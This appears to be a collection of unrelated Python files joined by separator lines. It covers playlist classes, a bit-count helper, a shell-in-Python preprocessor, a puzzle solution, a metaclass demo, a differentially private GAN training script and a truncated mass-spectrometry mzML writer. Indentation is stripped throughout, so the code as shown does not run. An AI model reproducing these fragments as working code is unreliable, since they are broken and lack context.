def contents(self) -> List[ArkhesResource]:
return arkhesPlaylists.ArkhesPlaylists.get_playlist_items(self._data_dict['name'])
def track_uris(self) -> List[str]:
return ArkhesResource.flatten([resource.track_uris() for resource in self.contents()])
class Playback(Song):
def __init__(self, data_dict: dict) -> None:
Song.__init__(self, data_dict['item'])
self._base_data_dict = data_dict
def is_none(self) -> bool:
return self._data_dict is None
def progress_ms(self) -> int:
return self._base_data_dict['progress_ms']
def progress(self) -> datetime.timedelta:
return datetime.timedelta(seconds=int(self.progress_ms()/1000))
def volume(self) -> int:
return self._base_data_dict['device']['volume_percent']
def context(self) -> ArkhesResource:
return self._base_data_dict['context']
|
# bit count library
# bitcount(val) returns number of set bits in val
# import the function bitcount()
__bctable__={}
__bctable__[0]=0
__bitmaskCacheBits__=16
#bitmaskCache=int("1"*8,2)
bitmaskCache=int("1"*__bitmaskCacheBits__,2)
#bitmaskCache=int("1"*32,2)
def __bitcountCache__(v0):
if v0 in __bctable__:
return __bctable__[v0]
c=0
# Recursive
# c=1+__bitcountCache__(v0 & (v0 - 1))
# Iterative
v=v0
while v:
v &= v -1;
c += 1;
# MIT Bitcount
# uCount = v0 - ((v0 >> 1) & 033333333333) - ((v0 >> 2) & 011111111111);
# c = ((uCount + (uCount >> 3)) & 030707070707) % 63;
__bctable__[v0]=c
return c
def bitcount(v):
c=0
while v:
c += __bitcountCache__(v & bitmaskCache)
v = v >> __bitmaskCacheBits__
return c
|
#!/usr/bin/env python
import os
import stat
import tempfile
import re
import getpass
import json
spy_file_pattern = re.compile(r'(.*)\.spy$')
shellpy_meta_pattern = re.compile(r'#shellpy-meta:(.*)')
shellpy_encoding_pattern = '#shellpy-encoding'
def preprocess_module(module_path):
"""The function compiles a module in shellpy to a python module, walking through all the shellpy files inside of
the module and compiling all of them to python
:param module_path: The path of module
:return: The path of processed module
"""
for item in os.walk(module_path):
path, dirs, files = item
for file in files:
if spy_file_pattern.match(file):
filepath = os.path.join(path, file)
preprocess_file(filepath, is_root_script=False)
return _translate_to_temp_path(module_path)
def preprocess_file(in_filepath, is_root_script, python_version=None):
"""Coverts a single shellpy file to python
:param in_filepath: The path of shellpy file to be processed
:param is_root_script: Shows whether the file being processed is a root file, which means the one
that user executed
:param python_version: version of python, needed to set correct header for root scripts
:return: The path of python file that was created of shellpy script
"""
new_filepath = spy_file_pattern.sub(r"\1.py", in_filepath)
out_filename = _translate_to_temp_path(new_filepath)
out_folder_path = os.path.dirname(out_filename)
if not is_root_script and not _is_compilation_needed(in_filepath, out_filename):
# TODO: cache root also
# TODO: if you don't compile but it's root, you need to change to exec
return out_filename
if not os.path.exists(out_folder_path):
os.makedirs(out_folder_path, mode=0o700)
header_data = _get_header(in_filepath, is_root_script, python_version)
with open(in_filepath, 'r') as f:
code = f.read()
out_file_data = _add_encoding_to_header(header_data, code)
intermediate = _preprocess_code_to_intermediate(code)
processed_code = _intermediate_to_final(intermediate)
out_file_data += processed_code
with open(out_filename, 'w') as f:
f.write(out_file_data)
in_file_stat = os.stat(in_filepath)
os.chmod(out_filename, in_file_stat.st_mode)
if is_root_script:
os.chmod(out_filename, in_file_stat.st_mode | stat.S_IEXEC)
return out_filename
def _get_username():
"""Returns the name of current user. The function is used in construction of the path for processed shellpy files on
temp file system
:return: The name of current user
"""
try:
n = getpass.getuser()
return n
except:
return 'no_username_found'
def _translate_to_temp_path(path):
"""Compiled shellpy files are stored on temp filesystem on path like this /{tmp}/{user}/{real_path_of_file_on_fs}
Every user will have its own copy of compiled shellpy files. Since we store them somewhere else relative to
the place where they actually are, we need a translation function that would allow us to easily get path
of compiled file
:param path: The path to be translated
:return: The translated path
"""
absolute_path = os.path.abspath(path)
relative_path = os.path.relpath(absolute_path, os.path.abspath(os.sep))
# TODO: this will not work in win where root is C:\ and absolute_in_path
# is on D:\
translated_path = os.path.join(tempfile.gettempdir(), 'shellpy_' + _get_username(), relative_path)
return translated_path
def _is_compilation_needed(in_filepath, out_filepath):
"""Shows whether compilation of input file is required. It may be not required if the output file did not change
:param in_filepath: The path of shellpy file to be processed
:param out_filepath: The path of the processed python file. It may exist or not.
:return: True if compilation is needed, False otherwise
"""
if not os.path.exists(out_filepath):
return True
in_mtime = os.path.getmtime(in_filepath)
with open(out_filepath, 'r') as f:
for i in range(0, 3): # scan only for three first lines
line = f.readline()
line_result = shellpy_meta_pattern.search(line)
if line_result:
meta = line_result.group(1)
meta = json.loads(meta)
if str(in_mtime) == meta['mtime']:
return False
return True
def _get_header(filepath, is_root_script, python_version):
"""To execute converted shellpy file we need to add a header to it. The header contains needed imports and
required code
:param filepath: A shellpy file that is being converted. It is needed to get modification time of it and save it
to the created python file. Then this modification time will be used to find out whether recompilation is needed
:param is_root_script: Shows whether the file being processed is a root file, which means the one
that user executed
:param python_version: version of python, needed to set correct header for root scripts
:return: data of the header
"""
header_name = 'header_root.tpl' if is_root_script else 'header.tpl'
header_filename = os.path.join(os.path.dirname(__file__), header_name)
with open(header_filename, 'r') as f:
header_data = f.read()
mod_time = os.path.getmtime(filepath)
meta = {'mtime': str(mod_time)}
header_data = header_data.replace('{meta}', json.dumps(meta))
if is_root_script:
executables = {
2: '#!/usr/bin/env python',
3: '#!/usr/bin/env python3'
}
header_data = header_data.replace('#shellpy-python-executable', executables[python_version])
return header_data
def _preprocess_code_to_intermediate(code):
"""Before compiling to actual python code all expressions are converted to universal intermediate form
It is very convenient as it is possible to perform common operations for all expressions
The intemediate form looks like this:
longline_shexe(echo 1)shexe(p)shexe
:param code: code to convert to intermediate form
:return: converted code
"""
processed_code = _process_multilines(code)
processed_code = _process_long_lines(processed_code)
processed_code = _process_code_both(processed_code)
processed_code = _process_code_start(processed_code)
return _escape(processed_code)
def _process_multilines(script_data):
"""Converts a pyshell multiline expression to one line pyshell expression, each line of which is separated
by semicolon. An example would be:
f = `
echo 1 > test.txt
ls -l
`
:param script_data: the string of the whole script
:return: the shellpy script with multiline expressions converted to intermediate form
"""
code_multiline_pattern = re.compile(r'^([^`\n\r]*?)([a-z]*)`\s*?$[\n\r]{1,2}(.*?)`\s*?$', re.MULTILINE | re.DOTALL)
script_data = code_multiline_pattern.sub(r'\1multiline_shexe(\3)shexe(\2)shexe', script_data)
pattern = re.compile(r'multiline_shexe.*?shexe', re.DOTALL)
new_script_data = script_data
for match in pattern.finditer(script_data):
original_str = script_data[match.start():match.end()]
processed_str = re.sub(r'([\r\n]{1,2})', r'; \\\1', original_str)
new_script_data = new_script_data.replace(
original_str, processed_str)
return new_script_data
def _process_long_lines(script_data):
"""Converts to python a pyshell expression that takes more than one line. An example would be:
f = `echo The string \
on several \
lines
:param script_data: the string of the whole script
:return: the shellpy script converted to intermediate form
"""
code_long_line_pattern = re.compile(r'([a-z]*)`(((.*?\\\s*?$)[\n\r]{1,2})+(.*$))', re.MULTILINE)
new_script_data = code_long_line_pattern.sub(r'longline_shexe(\2)shexe(\1)shexe', script_data)
return new_script_data
def _process_code_both(script_data):
"""Converts to python a pyshell script that has ` symbol both in the beginning of expression and in the end.
An example would be:
f = `echo 1`
:param script_data: the string of the whole script
:return: the shellpy script converted to intermediate form
"""
code_both_pattern = re.compile(r'([a-z]*)`(.*?)`')
new_script_data = code_both_pattern.sub(r'both_shexe(\2)shexe(\1)shexe', script_data)
return new_script_data
def _process_code_start(script_data):
"""Converts to python a pyshell script that has ` symbol only in the beginning. An example would be:
f = `echo 1
:param script_data: the string of the whole script
:return: the shellpy script converted to intermediate form
"""
code_start_pattern = re.compile(r'^([^\n\r`]*?)([a-z]*)`([^`\n\r]+)$', re.MULTILINE)
new_script_data = code_start_pattern.sub(r'\1start_shexe(\3)shexe(\2)shexe', script_data)
return new_script_data
def _escape(script_data):
"""Escapes shell commands
:param script_data: the string of the whole script
:return: escaped script
"""
pattern = re.compile(r'[a-z]*_shexe.*?shexe', re.DOTALL)
new_script_data = script_data
for match in pattern.finditer(script_data):
original_str = script_data[match.start():match.end()]
if original_str.find('\'') != -1:
processed_str = original_str.replace('\'', '\\\'')
new_script_data = new_script_data.replace(
original_str, processed_str)
return new_script_data
def _intermediate_to_final(script_data):
"""All shell blocks are first compiled to intermediate form. This part of code converts the intermediate
to final python code
:param script_data: the string of the whole script
:return: python script ready to be executed
"""
intermediate_pattern = re.compile(r'[a-z]*_shexe\((.*?)\)shexe\((.*?)\)shexe', re.MULTILINE | re.DOTALL)
final_script = intermediate_pattern.sub(r"exe('\1'.format(**dict(locals(), **globals())),'\2')", script_data)
return final_script
def _add_encoding_to_header(header_data, script_data):
"""PEP-0263 defines a way to specify python file encoding. If this encoding is present in first
two lines of a shellpy script it will then be moved to the top generated output file
:param script_data: the string of the whole script
:return: the script with the encoding moved to top, if it's present
"""
encoding_pattern = re.compile(r'^(#[-*\s]*coding[:=]\s*([-\w.]+)[-*\s]*)$')
# we use \n here instead of os.linesep since \n is universal as it is present in all OSes
# when \r\n returned by os.linesep may not work if you run against unix files from win
first_two_lines = script_data.split('\n')[:2]
for line in first_two_lines:
encoding = encoding_pattern.search(line)
if encoding is not None:
break
if not encoding:
return header_data
else:
new_header_data = header_data.replace(shellpy_encoding_pattern, encoding.group(1))
return new_header_data
|
import numpy as np
test_data = np.array([16, 1, 2, 0, 4, 2, 7, 1, 2, 14])
np_data = np.loadtxt("data.txt", delimiter=",", dtype=int)
def one(data: np.ndarray) -> int:
"""
Determine the horizontal position that the crabs can align to using the least fuel possible. How much fuel must they
spend to align to that position?
"""
median = np.median(data).astype(int)
return np.absolute(data - median).sum()
def two(data: np.ndarray) -> int:
"""
Determine the horizontal position that the crabs can align to using the least fuel possible so they can make you an
escape route! How much fuel must they spend to align to that position?
"""
mean = np.mean(data).astype(int)
diff = np.absolute(data - mean)
# 'Factorial for addition' is the same as (X^2 + X) / 2
return ((diff * diff + diff) / 2).astype(int).sum()
print(f"1. {one(np_data)}")
print(f"2. {two(np_data)}")
|
class Meta(type):
def __init__(cls, name, bases, namespace):
super(Meta, cls).__init__(name, bases, namespace)
print("Creating new class: {}".format(cls))
def __call__(cls):
new_instance = super(Meta, cls).__call__()
print("Class {} new instance: {}".format(cls, new_instance))
return new_instance
class C(metaclass=Meta):
pass
c = C()
print(c)
|
import os, sys
import numpy as np
import random
import copy
import torch
import torch.autograd as autograd
from torch.autograd import Variable
from torch.utils.data import DataLoader, Dataset, TensorDataset
import torchvision.transforms as transforms
import torchvision.datasets as datasets
from torch.utils.data.sampler import SubsetRandomSampler
from config import *
from models import *
from utils import *
from ops import exp_mov_avg
#from torchsummary import summary
from torchinfo import summary
from tqdm import tqdm
import pyvacy
#import torch.optim as optim
from pyvacy import optim, analysis, sampling
IMG_DIM = 768
NUM_CLASSES = 100
CLIP_BOUND = 1.
SENSITIVITY = 2.
DATA_ROOT = './../data'
iter_milestone = [1000, 5000, 10000, 20000]
acc_milestone = [i for i in range(10, 100, 10)]
acc_passed = [False for i in range(1, 10)]
##########################################################
### hook functions
##########################################################
def master_hook_adder(module, grad_input, grad_output):
'''
global hook
:param module:
:param grad_input:
:param grad_output:
:return:
'''
global dynamic_hook_function
return dynamic_hook_function(module, grad_input, grad_output)
def dummy_hook(module, grad_input, grad_output):
'''
dummy hook
:param module:
:param grad_input:
:param grad_output:
:return:
'''
pass
def modify_gradnorm_conv_hook(module, grad_input, grad_output):
'''
gradient modification hook
:param module:
:param grad_input:
:param grad_output:
:return:
'''
### get grad wrt. input (image)
grad_wrt_image = grad_input[0]
grad_input_shape = grad_wrt_image.size()
batchsize = grad_input_shape[0]
clip_bound_ = CLIP_BOUND / batchsize # account for the 'sum' operation in GP
grad_wrt_image = grad_wrt_image.view(batchsize, -1)
grad_input_norm = torch.norm(grad_wrt_image, p=2, dim=1)
### clip
clip_coef = clip_bound_ / (grad_input_norm + 1e-10)
clip_coef = clip_coef.unsqueeze(-1)
grad_wrt_image = clip_coef * grad_wrt_image
grad_input = (grad_wrt_image.view(grad_input_shape), grad_input[1], grad_input[2])
return tuple(grad_input)
def dp_conv_hook(module, grad_input, grad_output):
'''
gradient modification + noise hook
:param module:
:param grad_input:
:param grad_output:
:return:
'''
global noise_multiplier
### get grad wrt. input (image)
grad_wrt_image = grad_input[0]
grad_input_shape = grad_wrt_image.size()
batchsize = grad_input_shape[0]
clip_bound_ = CLIP_BOUND / batchsize
grad_wrt_image = grad_wrt_image.view(batchsize, -1)
grad_input_norm = torch.norm(grad_wrt_image, p=2, dim=1)
### clip
clip_coef = clip_bound_ / (grad_input_norm + 1e-10)
clip_coef = torch.min(clip_coef, torch.ones_like(clip_coef))
clip_coef = clip_coef.unsqueeze(-1)
grad_wrt_image = clip_coef * grad_wrt_image
### add noise
noise = clip_bound_ * noise_multiplier * SENSITIVITY * torch.randn_like(grad_wrt_image)
grad_wrt_image = grad_wrt_image + noise
grad_input_new = [grad_wrt_image.view(grad_input_shape)]
for i in range(len(grad_input)-1):
grad_input_new.append(grad_input[i+1])
return tuple(grad_input_new)
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size()[0], -1)
class Classifier(nn.Module):
def __init__(self):
super(Classifier, self).__init__()
#input [1, 28, 28]
self.model = nn.Sequential(
Flatten(),
nn.Linear(784, 128),
nn.ReLU(),
nn.Dropout(0.5),
nn.Linear(128, 10),
)
def forward(self, input):
return self.model(input)
FloatTensor = torch.cuda.FloatTensor
LongTensor = torch.cuda.LongTensor
def classify_training(netGS, dataset, iter):
### Data loaders
if dataset == 'mnist' or dataset == 'fashionmnist':
transform_train = transforms.Compose([
transforms.CenterCrop((28, 28)),
transforms.ToTensor(),
#transforms.Grayscale(),
])
elif dataset == 'cifar_100' or dataset == 'cifar_10':
transform_train = transforms.Compose([
transforms.CenterCrop((28, 28)),
transforms.Grayscale(),
transforms.ToTensor(),
])
if dataset == 'mnist':
dataloader = datasets.MNIST
test_set = dataloader(root=os.path.join(DATA_ROOT, 'MNIST'), train=False, download=True,
transform=transform_train)
IMG_DIM = 784
NUM_CLASSES = 10
elif dataset == 'fashionmnist':
dataloader = datasets.FashionMNIST
test_set = dataloader(root=os.path.join(DATA_ROOT, 'FashionMNIST'), train=False, download=True,
transform=transform_train)
elif dataset == 'cifar_100':
dataloader = datasets.CIFAR100
test_set = dataloader(root=os.path.join(DATA_ROOT, 'CIFAR100'), train=False, download=True,
transform=transform_train)
IMG_DIM = 3072
NUM_CLASSES = 100
elif dataset == 'cifar_10':
IMG_DIM = 784
NUM_CLASSES = 10
dataloader = datasets.CIFAR10
test_set = dataloader(root=os.path.join(DATA_ROOT, 'CIFAR10'), train=False, download=True,
transform=transform_train)
else:
raise NotImplementedError
test_loader = DataLoader(test_set, batch_size=1000, shuffle=False)
netGS.eval()
for i in tqdm(range(25)):
gen_labels = Variable(LongTensor(np.random.randint(0, 10, 2000)))
noise = Variable(FloatTensor(np.random.normal(0, 1, (2000, args.z_dim))))
synthesized = netGS(noise, gen_labels)
if (i == 0):
new_data = synthesized.cpu().detach()
new_label = gen_labels.cpu().detach()
else:
new_data = torch.cat((new_data, synthesized.cpu().detach()), 0)
new_label = torch.cat((new_label, gen_labels.cpu().detach()), 0)
new_data = torch.clamp(new_data, min=0., max=1.)
C = Classifier().cuda()
C.train()
opt_C = torch.optim.Adam(C.parameters(), lr=1e-3)
criterion = nn.CrossEntropyLoss()
gen_set = TensorDataset(new_data.cuda(), new_label.cuda())
gen_loader = DataLoader(gen_set, batch_size=32, shuffle=True)
prg_bar = tqdm(range(50))
for epoch in prg_bar:
train_acc = 0.0
train_loss = 0.0
for i, (data, label) in enumerate(gen_loader):
pred = C(data)
loss = criterion(pred, label)
opt_C.zero_grad()
loss.backward()
opt_C.step()
train_acc += np.sum(np.argmax(pred.cpu().data.numpy(), axis=1) == label.cpu().numpy())
train_loss += loss.item()
prg_bar.set_description(f'acc: {train_acc/gen_set.__len__():.3f} loss: {train_loss/gen_set.__len__():.4f}')
test_acc = 0.0
C.eval()
for i, (data, label) in enumerate(test_loader):
data = Variable(data.type(FloatTensor))
label = Variable(label.type(LongTensor))
pred = C(data)
test_acc += np.sum(np.argmax(pred.cpu().data.numpy(), axis=1) == label.cpu().numpy())
test_acc /= test_set.__len__()
test_acc *= 100
print(f'the final result of test accuracy = {test_acc/100:.3f}')
for i in range(9):
if (test_acc > acc_milestone[i] and acc_passed[i] == False):
acc_passed[i] = True
torch.save(netGS, os.path.join(args.checkpoint, f'diff_acc/{acc_milestone[i]}.pth'))
with open(os.path.join(args.checkpoint, f'diff_acc/result.txt'), 'a') as f:
f.write(f"thres:{acc_milestone[i]}% iter:{iter}, acc:{test_acc:.1f}%\n")
if (iter in iter_milestone):
torch.save(netGS, os.path.join(args.checkpoint, f'diff_iter/{iter}.pth'))
with open(os.path.join(args.checkpoint, f'diff_iter/result.txt'), 'a') as f:
f.write(f"iter:{iter}, acc:{test_acc:.1f}%\n")
del C, new_data, new_label, gen_set, gen_loader
torch.cuda.empty_cache()
def add_noise(net):
with torch.no_grad():
for p_net in net.parameters():
grad_input_shape = p_net.grad.shape
batchsize = grad_input_shape[0]
clip_bound_ = CLIP_BOUND / batchsize
grad_wrt_image = p_net.grad.view(batchsize, -1)
grad_input_norm = torch.norm(grad_wrt_image, p=2, dim=1)
### clip
clip_coef = clip_bound_ / (grad_input_norm + 1e-10)
clip_coef = torch.min(clip_coef, torch.ones_like(clip_coef))
clip_coef = clip_coef.unsqueeze(-1)
grad_wrt_image = clip_coef * grad_wrt_image
### add noise
global noise_multiplier
noise = clip_bound_ * noise_multiplier * SENSITIVITY * torch.randn_like(grad_wrt_image)
grad_wrt_image = grad_wrt_image + noise
grad_input_new = grad_wrt_image.view(grad_input_shape)
p_net = grad_input_new
return net
##########################################################
### main
##########################################################
def main(args):
### config
global noise_multiplier
dataset = args.dataset
num_discriminators = args.num_discriminators
noise_multiplier = args.noise_multiplier
z_dim = args.z_dim
model_dim = args.model_dim
batchsize = args.batchsize
L_gp = args.L_gp
L_epsilon = args.L_epsilon
critic_iters = args.critic_iters
latent_type = args.latent_type
load_dir = args.load_dir
save_dir = args.save_dir
if_dp = (args.dp > 0.)
gen_arch = args.gen_arch
num_gpus = args.num_gpus
### CUDA
use_cuda = torch.cuda.is_available()
devices = [torch.device("cuda:%d" % i if use_cuda else "cpu") for i in range(num_gpus)]
device0 = devices[0]
if use_cuda:
torch.set_default_tensor_type('torch.cuda.FloatTensor')
### Random seed
random.seed(args.random_seed)
np.random.seed(args.random_seed)
torch.manual_seed(args.random_seed)
### Fix noise for visualization
if latent_type == 'normal':
fix_noise = torch.randn(10, z_dim)
elif latent_type == 'bernoulli':
p = 0.5
bernoulli = torch.distributions.Bernoulli(torch.tensor([p]))
fix_noise = bernoulli.sample((10, z_dim)).view(10, z_dim)
else:
raise NotImplementedError
### Set up models
print('gen_arch:' + gen_arch)
netG = GeneratorDCGAN(z_dim=z_dim, model_dim=model_dim, num_classes=10)
netGS = copy.deepcopy(netG)
netD_list = []
for i in range(num_discriminators):
netD = DiscriminatorDCGAN()
netD_list.append(netD)
### Load pre-trained discriminators
print("load pre-training...")
if load_dir is not None:
for netD_id in range(num_discriminators):
print('Load NetD ', str(netD_id))
network_path = os.path.join(load_dir, 'netD_%d' % netD_id, 'netD.pth')
netD = netD_list[netD_id]
netD.load_state_dict(torch.load(network_path))
netG = netG.to(device0)
for netD_id, netD in enumerate(netD_list):
device = devices[get_device_id(netD_id, num_discriminators, num_gpus)]
netD.to(device)
### Set up optimizers
optimizerD_list = []
for i in range(num_discriminators):
netD = netD_list[i]
opt_D = pyvacy.optim.DPAdam(
l2_norm_clip = 1.0,
noise_multiplier = noise_multiplier,
minibatch_size = args.batchsize,
microbatch_size = 1,
params = netD.parameters(),
lr = 1e-4,
betas = (0.5, 0.999),
)
#optimizerD = optim.Adam(netD.parameters(), lr=1e-4, betas=(0.5, 0.99))
optimizerD_list.append(opt_D)
optimizerG = optim.Adam(netG.parameters(), lr=1e-4, betas=(0.5, 0.99))
### Data loaders
if dataset == 'mnist' or dataset == 'fashionmnist':
transform_train = transforms.Compose([
transforms.CenterCrop((28, 28)),
transforms.ToTensor(),
#transforms.Grayscale(),
])
elif dataset == 'cifar_100' or dataset == 'cifar_10':
transform_train = transforms.Compose([
transforms.CenterCrop((28, 28)),
transforms.Grayscale(),
transforms.ToTensor(),
])
if dataset == 'mnist':
dataloader = datasets.MNIST
trainset = dataloader(root=os.path.join(DATA_ROOT, 'MNIST'), train=True, download=True,
transform=transform_train)
IMG_DIM = 784
NUM_CLASSES = 10
elif dataset == 'fashionmnist':
dataloader = datasets.FashionMNIST
trainset = dataloader(root=os.path.join(DATA_ROOT, 'FashionMNIST'), train=True, download=True,
transform=transform_train)
elif dataset == 'cifar_100':
dataloader = datasets.CIFAR100
trainset = dataloader(root=os.path.join(DATA_ROOT, 'CIFAR100'), train=True, download=True,
transform=transform_train)
IMG_DIM = 3072
NUM_CLASSES = 100
elif dataset == 'cifar_10':
IMG_DIM = 784
NUM_CLASSES = 10
dataloader = datasets.CIFAR10
trainset = dataloader(root=os.path.join(DATA_ROOT, 'CIFAR10'), train=True, download=True,
transform=transform_train)
else:
raise NotImplementedError
print('creat indices file')
indices_full = np.arange(len(trainset))
np.random.shuffle(indices_full)
#indices_full.dump(os.path.join(save_dir, 'indices.npy'))
trainset_size = int(len(trainset) / num_discriminators)
print('Size of the dataset: ', trainset_size)
mini_loader, micro_loader = pyvacy.sampling.get_data_loaders(batchsize, 1, args.iterations)
input_pipelines = []
for i in range(num_discriminators):
'''
start = i * trainset_size
end = (i + 1) * trainset_size
indices = indices_full[start:end]
trainloader = DataLoader(trainset, batch_size=args.batchsize, drop_last=False,
num_workers=args.num_workers, sampler=SubsetRandomSampler(indices))
#input_data = inf_train_gen(trainloader)
input_pipelines.append(trainloader)
'''
start = i * trainset_size
end = (i + 1) * trainset_size
indices = indices_full[start:end]
trainset_1 = torch.utils.data.Subset(trainset, indices)
trainloader = mini_loader(trainset_1)
input_pipelines.append(trainloader)
### not add noise by hook which is middle between G/D
'''
if if_dp:
### Register hook
global dynamic_hook_function
for netD in netD_list:
netD.conv1.register_backward_hook(master_hook_adder)
'''
prg_bar = tqdm(range(args.iterations+1))
for iters in prg_bar:
#########################
### Update D network
#########################
netD_id = np.random.randint(num_discriminators, size=1)[0]
device = devices[get_device_id(netD_id, num_discriminators, num_gpus)]
netD = netD_list[netD_id]
optimizerD = optimizerD_list[netD_id]
input_data = input_pipelines[netD_id]
for p in netD.parameters():
p.requires_grad = True
'''
### Register hook for add noise to D
if if_dp:
for parameter in netD.parameters():
if parameter.requires_grad:
parameter.register_hook(
lambda grad: grad + (1 / batchsize) * noise_multiplier * torch.randn(grad.shape) * SENSITIVITY
#lambda grad: grad
)
'''
optimizerD.zero_grad()
x_mini, y_mini = next(iter(input_data))
for real_data, real_y in micro_loader(TensorDataset(x_mini, y_mini)):
real_data = real_data.view(-1, IMG_DIM)
real_data = real_data.to(device)
real_y = real_y.to(device)
real_data_v = autograd.Variable(real_data)
### train with real
dynamic_hook_function = dummy_hook
netD.zero_grad()
D_real_score = netD(real_data_v, real_y)
D_real = -D_real_score.mean()
### train with fake
batchsize = real_data.shape[0]
if latent_type == 'normal':
noise = torch.randn(batchsize, z_dim).to(device0)
elif latent_type == 'bernoulli':
noise = bernoulli.sample((batchsize, z_dim)).view(batchsize, z_dim).to(device0)
else:
raise NotImplementedError
noisev = autograd.Variable(noise)
fake = autograd.Variable(netG(noisev, real_y.to(device0)).data)
inputv = fake.to(device)
D_fake = netD(inputv, real_y.to(device))
D_fake = D_fake.mean()
'''
### train with gradient penalty
gradient_penalty = netD.calc_gradient_penalty(real_data_v.data, fake.data, real_y, L_gp, device)
D_cost = D_fake + D_real + gradient_penalty
### train with epsilon penalty
logit_cost = L_epsilon * torch.pow(D_real_score, 2).mean()
D_cost += logit_cost
'''
### update
optimizerD.zero_microbatch_grad()
D_cost = D_fake + D_real
D_cost.backward()
#import ipdb;ipdb.set_trace()
optimizerD.microbatch_step()
Wasserstein_D = -D_real - D_fake
optimizerD.step()
del real_data, real_y, fake, noise, inputv, D_real, D_fake#, logit_cost, gradient_penalty
torch.cuda.empty_cache()
############################
# Update G network
###########################
if if_dp:
### Sanitize the gradients passed to the Generator
dynamic_hook_function = dp_conv_hook
else:
### Only modify the gradient norm, without adding noise
dynamic_hook_function = modify_gradnorm_conv_hook
for p in netD.parameters():
p.requires_grad = False
netG.zero_grad()
### train with sanitized discriminator output
if latent_type == 'normal':
noise = torch.randn(batchsize, z_dim).to(device0)
elif latent_type == 'bernoulli':
noise = bernoulli.sample((batchsize, z_dim)).view(batchsize, z_dim).to(device0)
else:
raise NotImplementedError
label = torch.randint(0, NUM_CLASSES, [batchsize]).to(device0)
noisev = autograd.Variable(noise)
fake = netG(noisev, label)
#summary(netG, input_data=[noisev,label])
fake = fake.to(device)
label = label.to(device)
G = netD(fake, label)
G = - G.mean()
### update
optimizerG.zero_grad()
G.backward()
G_cost = G
optimizerG.step()
### update the exponential moving average
exp_mov_avg(netGS, netG, alpha=0.999, global_step=iters)
############################
### Results visualization
############################
prg_bar.set_description('iter:{}, G_cost:{:.2f}, D_cost:{:.2f}, Wasserstein:{:.2f}'.format(iters, G_cost.cpu().data,
D_cost.cpu().data,
Wasserstein_D.cpu().data
))
if iters % args.vis_step == 0:
if dataset == 'mnist':
generate_image_mnist(iters, netGS, fix_noise, save_dir, device0)
elif dataset == 'cifar_100':
generate_image_cifar100(iters, netGS, fix_noise, save_dir, device0)
elif dataset == 'cifar_10':
generate_image_mnist(iters, netGS, fix_noise, save_dir, device0)
if iters % args.save_step == 0:
### save model
torch.save(netGS.state_dict(), os.path.join(save_dir, 'netGS_%d.pth' % iters))
del label, fake, noisev, noise, G, G_cost, D_cost
torch.cuda.empty_cache()
if ((iters+1) % 500 == 0):
classify_training(netGS, dataset, iters+1)
### save model
torch.save(netG, os.path.join(save_dir, 'netG.pth'))
torch.save(netGS, os.path.join(save_dir, 'netGS.pth'))
if __name__ == '__main__':
args = parse_arguments()
save_config(args)
main(args)
|
"""Main module."""
import io
import pathlib
import time
import warnings
from pprint import pformat
from typing import Callable, Dict, List, Tuple, Union
from collections import Counter
import numpy as np
import pyqms
import scipy as sci
from intervaltree import IntervalTree
from loguru import logger
from psims.mzml import MzMLWriter
from tqdm import tqdm
import smiter
from smiter.fragmentation_functions import AbstractFragmentor
from smiter.lib import (
calc_mz,
check_mzml_params,
check_peak_properties,
peak_properties_to_csv,
)
from smiter.noise_functions import AbstractNoiseInjector
from smiter.peak_distribution import distributions
warnings.filterwarnings("ignore")
class Scan(dict):
"""Summary."""
def __init__(self, data: dict = None):
"""Summary.
Args:
dict (TYPE): Description
"""
if data is not None:
self.update(data)
@property
def mz(self):
"""Summary."""
v = self.get("mz", None)
return v
@mz.setter
def mz(self, mz):
"""Summary."""
self["mz"] = mz
@property
def i(self):
"""Summary."""
v = self.get("i", None)
return v
@i.setter
def i(self, i):
"""Summary."""
self["i"] = i
@property
def id(self):
"""Summary."""
v = self.get("id", None)
return v
@property
def precursor_mz(self):
"""Summary."""
v = self.get("precursor_mz", None)
return v
@property
def precursor_i(self):
"""Summary."""
v = self.get("precursor_i", None)
return v
@property
def precursor_charge(self):
"""Summary."""
v = self.get("precursor_charge", None)
return v
# @property
# def precursor_scan_id(self):
# """Summary."""
# v = self.get("precursor_scan_id", None)
# return v
@property
def retention_time(self):
"""Summary."""
v = self.get("rt", None)
return v
@property
def ms_level(self):
"""Summary.
Returns:
TYPE: Description
"""
v = self.get("ms_level", None)
return v
def generate_interval_tree(peak_properties):
"""Conctruct an interval tree containing the elution windows of the analytes.
Args:
peak_properties (dict): Description
Returns:
IntervalTree: Description
"""
tree = IntervalTree()
for key, data in peak_properties.items():
start = data["scan_start_time"]
end = start + data["peak_width"]
tree[start:end] = key
return tree
# @profile
def write_mzml(
file: Union[str, io.TextIOWrapper],
peak_properties: Dict[str, dict],
fragmentor: AbstractFragmentor,
noise_injector: AbstractNoiseInjector,
mzml_params: Dict[str, Union[int, float, str]],
) -> str:
"""Write mzML file with chromatographic peaks and fragment spectra for the given molecules.
Args:
file (Union[str, io.TextIOWrapper]): Description
molecules (List[str]): Description
fragmentation_function (Callable[[str], List[Tuple[float, float]]], optional): Description
peak_properties (Dict[str, dict], optional): Description
"""
# check params and raise Exception(s) if necessary
logger.info("Start generating mzML")
mzml_params = check_mzml_params(mzml_params)
peak_properties = check_peak_properties(peak_properties)
interval_tree = generate_interval_tree(peak_properties)
filename = file if isinstance(file, str) else file.name
scans = []
trivial_names = {}
charges = set()
for key, val in peak_properties.items():
trivial_names[val["chemical_formula"]] = key
charges.add(val["charge"])
# trivial_names = {
# val["chemical_formula"]: key for key, val in peak_properties.items()
# }
# dicts are sorted, language specification since python 3.7+
isotopologue_lib = generate_molecule_isotopologue_lib(
peak_properties, trivial_names=trivial_names, charges=charges
)
scans, scan_dict = generate_scans(
isotopologue_lib,
peak_properties,
interval_tree,
fragmentor,
noise_injector,
mzml_params,
)
logger.info("Delete interval tree")
del interval_tree
write_scans(file, scans)
if not isinstance(file, str):
file_path = file.name
else:
file_path = file
path = pathlib.Path(file_path)
summary_path = path.parent.resolve() / "molecule_summary.csv"
peak_properties_to_csv(peak_properties, summary_path)
return filename
# @profile
def rescale_intensity(
i: float, rt: float, molecule: str, peak_properties: dict, isotopologue_lib: dict
):
"""Rescale intensity value for a given molecule according to scale factor and distribution function.
Args:
i (TYPE): Description
rt (TYPE): Description
molecule (TYPE): Description
peak_properties (TYPE): Description
isotopologue_lib (TYPE): Description
Returns:
TYPE: Description
"""
scale_func = peak_properties[f"{molecule}"]["peak_function"]
rt_max = (
peak_properties[f"{molecule}"]["scan_start_time"]
+ peak_properties[f"{molecule}"]["peak_width"]
)
